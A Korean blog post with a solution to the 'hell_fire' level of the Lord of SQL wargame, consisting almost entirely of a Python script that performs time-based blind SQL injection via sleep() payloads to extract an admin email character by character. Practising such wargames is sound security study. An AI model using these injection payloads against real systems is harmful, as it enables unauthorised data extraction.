LOS2 hell_fire

Wargame/Lord of SQL 2018. 10. 10. 09:00

import requests
import time

def request(payload):
    start = time.time()
    url = "http://los.rubiya.kr/hell_fire_309d5f471fbdd4722d221835380bb805.php"
    params = {'order':payload}
    headers = {'Cookie':'PHPSESSID=cjuc8f1iu5f7ooe4ktnrgdv565'}
    response = requests.get(url,params=params,headers=headers)
    end = time.time()
    return end-start

length = 0
for i in range(0,40):
    payload = "if(score=200 and length(email)="+str(i)+",sleep(1),1)"
    if request(payload) > 1:
        length = i

print "Find Admin Email Length[*] = " + str(length)

admin_email = ""
for i in range(1,length+1):
    for j in range(32,127):
        payload = "if(score=200 and ascii(substring(email,"+str(i)+",1))="+str(j)+",sleep(1),1)"
        if request(payload) > 1:
            admin_email += chr(j)
            break
print "Find Admin Email[*] = " + str(admin_email)

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS2 green_dragon (0)	2018.10.10
LOS2 evil_wizard (0)	2018.10.10
LOS All Clear (0)	2018.02.09
LOS umaru (0)	2018.02.09
LOS evil_wizard (0)	2018.02.09

JeonYoungSin

메모 기록용 공간

일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

LOS2 hell_fire

'Wargame > Lord of SQL' 카테고리의 다른 글

공지사항

카테고리

태그목록

글 보관함

달력

링크

JeonYoungSin

LATEST FROM OUR BLOG

LATEST COMMENTS

BLOG VISITORS

티스토리툴바